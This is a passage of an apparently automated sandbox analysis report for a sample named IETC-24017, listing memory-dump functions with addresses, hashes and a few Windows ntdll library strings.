                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 914d59005b677f00ab80b6777af9c0b4996401e5abe3a789377e80bf16aa37b4
                                                                                                                                                  • Instruction ID: 32e77d2b029780e17746887c9bba2d4eafca2144ef59bdbdac42d3f1dd21ad71
                                                                                                                                                  • Opcode Fuzzy Hash: 914d59005b677f00ab80b6777af9c0b4996401e5abe3a789377e80bf16aa37b4
                                                                                                                                                  • Instruction Fuzzy Hash: 8490023120140406D241759954086460405D7E1301F55D012BA028555EC6658A956632
                                                                                                                                                  Function 01842CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8e627f8bdbcf3864976cc4f1e2d7f4c99e8474c55eb3384dd18d4b458bf04ea0
                                                                                                                                                  • Instruction ID: 71da3074bdc6114e7b284999d1595c9e65c6680ed118fd3c01420d29848ed26d
                                                                                                                                                  • Opcode Fuzzy Hash: 8e627f8bdbcf3864976cc4f1e2d7f4c99e8474c55eb3384dd18d4b458bf04ea0
                                                                                                                                                  • Instruction Fuzzy Hash: 9890022160540406D281715954187060415D7D1301F55D012B5028554DC6598B596BA2
                                                                                                                                                  Function 01842CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 26be8f20111cd9079b9f6a04b2f148d943c0a32ae678cb402d688de004f25f74
                                                                                                                                                  • Instruction ID: 82248a0ec6d5370b91694004f9f29c1864b1606e651d94dcc05dea68257a9ad4
                                                                                                                                                  • Opcode Fuzzy Hash: 26be8f20111cd9079b9f6a04b2f148d943c0a32ae678cb402d688de004f25f74
                                                                                                                                                  • Instruction Fuzzy Hash: E890023120140407D241715955087070405D7D1301F55D412B5428558DD6568A556622
                                                                                                                                                  Function 01842C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f0e770e62c03622bd9a8081e2f38d3deaf0e2a1b8979427e3ae642886686fc5b
                                                                                                                                                  • Instruction ID: f38a01c234397744e44813ab95d1c51b1d30fd43315f0f2fe7a0e88ce43c1726
                                                                                                                                                  • Opcode Fuzzy Hash: f0e770e62c03622bd9a8081e2f38d3deaf0e2a1b8979427e3ae642886686fc5b
                                                                                                                                                  • Instruction Fuzzy Hash: 7F90023120140846D24171594404B460405D7E1301F55C017B5128654DC615CA557A22
                                                                                                                                                  Function 01842F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f23c3ff3f335c9ca87643121e76483e8cbc87a6556fbec670ea7c45ba7e9e010
                                                                                                                                                  • Instruction ID: 979a162a6b3cd00562f6e3fb2fad70aa4a317e539a4c352a1a55aa39295d2f4e
                                                                                                                                                  • Opcode Fuzzy Hash: f23c3ff3f335c9ca87643121e76483e8cbc87a6556fbec670ea7c45ba7e9e010
                                                                                                                                                  • Instruction Fuzzy Hash: 1A90023120180406D2417159481470B0405D7D1302F55C012B6168555DC6258A556A72
                                                                                                                                                  Function 01842FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c2ccf4270d7f4e88d9174f0c8949b98c012fee616f608bdb96504da67f12c9c1
                                                                                                                                                  • Instruction ID: 1e8b21fa3de938e25dcff2ef3ee5e97dd8a7a69401d08f6ed632d57dabb4a27b
                                                                                                                                                  • Opcode Fuzzy Hash: c2ccf4270d7f4e88d9174f0c8949b98c012fee616f608bdb96504da67f12c9c1
                                                                                                                                                  • Instruction Fuzzy Hash: 0B90023120180406D241715948087470405D7D1302F55C012BA168555EC665CA956A32
                                                                                                                                                  Function 01842FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 664505a26aaa76a4dd1334b06fad636375fcdce29d245a2d2f75d2d9d2539367
                                                                                                                                                  • Instruction ID: 9f1eeecc502ed8094b4c2c796b48507f33edafeb575b3965977aa65d4bd0246b
                                                                                                                                                  • Opcode Fuzzy Hash: 664505a26aaa76a4dd1334b06fad636375fcdce29d245a2d2f75d2d9d2539367
                                                                                                                                                  • Instruction Fuzzy Hash: 62900221601400464281716988449064405FBE2311755C122B599C550DC5598A695B66
                                                                                                                                                  Function 01842FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8898727ffc23eb4f5c53b441b14b47b290c56b64e728f623f4e21a0b840010ec
                                                                                                                                                  • Instruction ID: a79e86d255432b066e9e50ea74cbd84e9c5373d6c11888b87ca19c58f09357a9
                                                                                                                                                  • Opcode Fuzzy Hash: 8898727ffc23eb4f5c53b441b14b47b290c56b64e728f623f4e21a0b840010ec
                                                                                                                                                  • Instruction Fuzzy Hash: 67900221211C0046D34175694C14B070405D7D1303F55C116B5158554CC9158A655A22
                                                                                                                                                  Function 01842F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bc4f87e87b1292b62edbbac9b75ae1a63cd22bc8fd785d37d73874c14e89be07
                                                                                                                                                  • Instruction ID: 3dd2a0c156c9458ba7fc4f16ff251ae7b607cb99b8bc043166140814d5569106
                                                                                                                                                  • Opcode Fuzzy Hash: bc4f87e87b1292b62edbbac9b75ae1a63cd22bc8fd785d37d73874c14e89be07
                                                                                                                                                  • Instruction Fuzzy Hash: 6390026134140446D24171594414B060405D7E2301F55C016F6068554DC619CE566627
                                                                                                                                                  Function 01842F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: eccbdf3f067d9021c067d88cffcf6742cb65eeb4ca80e912e672255d599ad218
                                                                                                                                                  • Instruction ID: 27cfb8073caee5078ee4ff8c500976e649ce7a717d5b1da0a198c563a990ebb3
                                                                                                                                                  • Opcode Fuzzy Hash: eccbdf3f067d9021c067d88cffcf6742cb65eeb4ca80e912e672255d599ad218
                                                                                                                                                  • Instruction Fuzzy Hash: 6E90026121140046D245715944047060445D7E2301F55C013B7158554CC5298E655626
                                                                                                                                                  Function 01842E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2aae1d5997038620159eea1dd691660924ef2b0e9b69231f4fe1fe0cb144a775
                                                                                                                                                  • Instruction ID: 344a8f2abf7da5226929874857812dc65e04f6ce0c39318435cbdb4ed7270f6a
                                                                                                                                                  • Opcode Fuzzy Hash: 2aae1d5997038620159eea1dd691660924ef2b0e9b69231f4fe1fe0cb144a775
                                                                                                                                                  • Instruction Fuzzy Hash: F390022160140506D24271594404616040AD7D1341F95C023B6028555ECA258B96A632
                                                                                                                                                  Function 01842EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e9d914e6057b48da24ac797270427f615809036cfaae31d19b117cf85df21202
                                                                                                                                                  • Instruction ID: f1da57029ee4288736cdcb131633c19a191e459487d3a83dc3ae487355095595
                                                                                                                                                  • Opcode Fuzzy Hash: e9d914e6057b48da24ac797270427f615809036cfaae31d19b117cf85df21202
                                                                                                                                                  • Instruction Fuzzy Hash: 9090027120140406D281715944047460405D7D1301F55C012BA068554EC6598FD96B66
                                                                                                                                                  Function 01842EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e99a18ccf99aab28d81e778aa20ab27e6689b7ab14868781fa1b76f305b2288e
                                                                                                                                                  • Instruction ID: 4d59b8518fc20cd6cf4a99cfe567efd3f07b99527c20a6d2d6406c6f5212cbfa
                                                                                                                                                  • Opcode Fuzzy Hash: e99a18ccf99aab28d81e778aa20ab27e6689b7ab14868781fa1b76f305b2288e
                                                                                                                                                  • Instruction Fuzzy Hash: 0290026120180407D281755948046070405D7D1302F55C012B7068555ECA298E556636
                                                                                                                                                  Function 01842E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 603974b34746af6acd3d728065d6186ff2d5f534af071338eece37dcb55e9aae
                                                                                                                                                  • Instruction ID: c7a42eb24a97ce5b3773e99021b6bbf6e04b92074585bd99cf927b486d2a6039
                                                                                                                                                  • Opcode Fuzzy Hash: 603974b34746af6acd3d728065d6186ff2d5f534af071338eece37dcb55e9aae
                                                                                                                                                  • Instruction Fuzzy Hash: 1590022130140406D243715944146060409D7D2345F95C013F6428555DC6258B57A633
                                                                                                                                                  Function 01843090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 01cd92d4f572f8ae4a1fa56cc8216ec592df8c87cebd9eeef30c0c51ee803700
                                                                                                                                                  • Instruction ID: 584ff8bdcf5ea2a63f7723038de20ac4cb0c3daf818b0036d4231ed90dbc52e8
                                                                                                                                                  • Opcode Fuzzy Hash: 01cd92d4f572f8ae4a1fa56cc8216ec592df8c87cebd9eeef30c0c51ee803700
                                                                                                                                                  • Instruction Fuzzy Hash: 1890022124140806D281715984147070406D7D1701F55C012B5028554DC6168B696BB2
                                                                                                                                                  Function 01843010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: faafd7e69edc78380b4437f4fee155f42c28fb11bef880f10b44e37d73fd9334
                                                                                                                                                  • Instruction ID: c7fa29ac9f980d0685d23db8d529316bfaa5e36bf7246f018ddd6094e644b56d
                                                                                                                                                  • Opcode Fuzzy Hash: faafd7e69edc78380b4437f4fee155f42c28fb11bef880f10b44e37d73fd9334
                                                                                                                                                  • Instruction Fuzzy Hash: 4D90022120184446D28172594804B0F4505D7E2302F95C01AB915A554CC9158A595B22
                                                                                                                                                  Function 018439B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c0f7f41eac6a06da4e26967e5a44c975ae53fea27661038157718af5ae7360e0
                                                                                                                                                  • Instruction ID: 21c51f7ef29b13a5fe23ae6f8ef5884c9bf8a6dff4fa17c5de9d664cb37bfaa0
                                                                                                                                                  • Opcode Fuzzy Hash: c0f7f41eac6a06da4e26967e5a44c975ae53fea27661038157718af5ae7360e0
                                                                                                                                                  • Instruction Fuzzy Hash: 1290022124545106D291715D44046164405F7E1301F55C022B5818594DC5558A596722
                                                                                                                                                  Function 01843D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 30a76e0f1cee2079012d40b14aac9061204a38bb50a0dd8a710ce88ed2c0a4cc
                                                                                                                                                  • Instruction ID: a5084bc6bad30e0ee6eb05e3e24b0278c4518a6e0bd8945709fbd791d91ad68f
                                                                                                                                                  • Opcode Fuzzy Hash: 30a76e0f1cee2079012d40b14aac9061204a38bb50a0dd8a710ce88ed2c0a4cc
                                                                                                                                                  • Instruction Fuzzy Hash: EC90023120240146968172595804A4E4505D7E2302B95D416B5019554CC9148A655722
                                                                                                                                                  Function 01843D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1d66b8ad11d0a0b646b68086c54811abb0dbecf2b03ed58af5e03af961c51acf
                                                                                                                                                  • Instruction ID: fb9db82e1be6a39cbbbf6dde6c33db016ea35fc88c7bf50e935412d81ece2f8c
                                                                                                                                                  • Opcode Fuzzy Hash: 1d66b8ad11d0a0b646b68086c54811abb0dbecf2b03ed58af5e03af961c51acf
                                                                                                                                                  • Instruction Fuzzy Hash: F890023520140406D651715958046460446D7D1301F55D412B5428558DC6548AA5A622
                                                                                                                                                  Function 01842C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                  • Instruction ID: 3614c6967db129892fb6dea05f8850075bcc06a13b5a958a712c0f69544c3b20
                                                                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                  Function 01842890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: 699260abc55db063fa12d63e8820083c8e3f163fcaf6abf6d543e4ffd133e1c5
                                                                                                                                                  • Instruction ID: ac23de48fb500d35b4afcf67ba69a75185f83c6d14bf788d342e7f61133f3053
                                                                                                                                                  • Opcode Fuzzy Hash: 699260abc55db063fa12d63e8820083c8e3f163fcaf6abf6d543e4ffd133e1c5
                                                                                                                                                  • Instruction Fuzzy Hash: 0751F6B6A0411EBFDB11DBAC989097EFBB9BB083407148229F4A5D7642D734DF0087A0
                                                                                                                                                  Function 018B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: 4bf5bd5f7a77cdaacc0c494fd6cb0c675c5c171d6ff49ef11333654d7ce3e145
                                                                                                                                                  • Instruction ID: 44c98392fce92e671d1afc68ff197d3865f8cab0129e0b2f09c605f4bcd57db0
                                                                                                                                                  • Opcode Fuzzy Hash: 4bf5bd5f7a77cdaacc0c494fd6cb0c675c5c171d6ff49ef11333654d7ce3e145
                                                                                                                                                  • Instruction Fuzzy Hash: 4251D5B1A00646AACB64DE5CC8D09BFB7BAEB44305B048459F5A6D7742D678EB40C760
                                                                                                                                                  Function 01837630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • ExecuteOptions, xrefs: 018746A0
                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01874742
                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01874725
                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01874655
                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01874787
                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018746FC
                                                                                                                                                  • Execute=1, xrefs: 01874713
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                  • Opcode ID: ef1eee5da71aa3d60e20f6db1df3bd845dbdd36c4907c3e3bc885bf84dc66d40
                                                                                                                                                  • Instruction ID: d190ed524e5e2cd3b87299e1ecf214e270e9aa7426c39b0242603323cefc47f3
                                                                                                                                                  • Opcode Fuzzy Hash: ef1eee5da71aa3d60e20f6db1df3bd845dbdd36c4907c3e3bc885bf84dc66d40
                                                                                                                                                  • Instruction Fuzzy Hash: 955119B160021E7BEF21EAA8DC95FA977A8EF58304F0800A9D605E7191EB70DF45DF91
                                                                                                                                                  Function 0184B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                  • Instruction ID: f26c6fb16188348fba4d2f586a791c19bf612f9b85a0f072aa505761c421dbc2
                                                                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                  • Instruction Fuzzy Hash: 1E81AD70A0524D9FEF29CF6CC8917BEBBA2AF45360F18411AD861E7291CF34DA408B51
                                                                                                                                                  Function 018B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                  • Opcode ID: 2bae25563fc3c2ada4bf629c73fdfca0e035a964dc398d8c7f7dbe8ed4e41a9a
                                                                                                                                                  • Instruction ID: bc9caf8315a3c17b82cd9ac710b2cfe562dcca70f4cf4c4ad5cba1f846c714a8
                                                                                                                                                  • Opcode Fuzzy Hash: 2bae25563fc3c2ada4bf629c73fdfca0e035a964dc398d8c7f7dbe8ed4e41a9a
                                                                                                                                                  • Instruction Fuzzy Hash: A121367AA00519ABDB11DE6DD890AEEBBE9EF54754F44011AE955D3300E730FB028BA1
                                                                                                                                                  Function 0182F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018702BD
                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018702E7
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 0187031E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
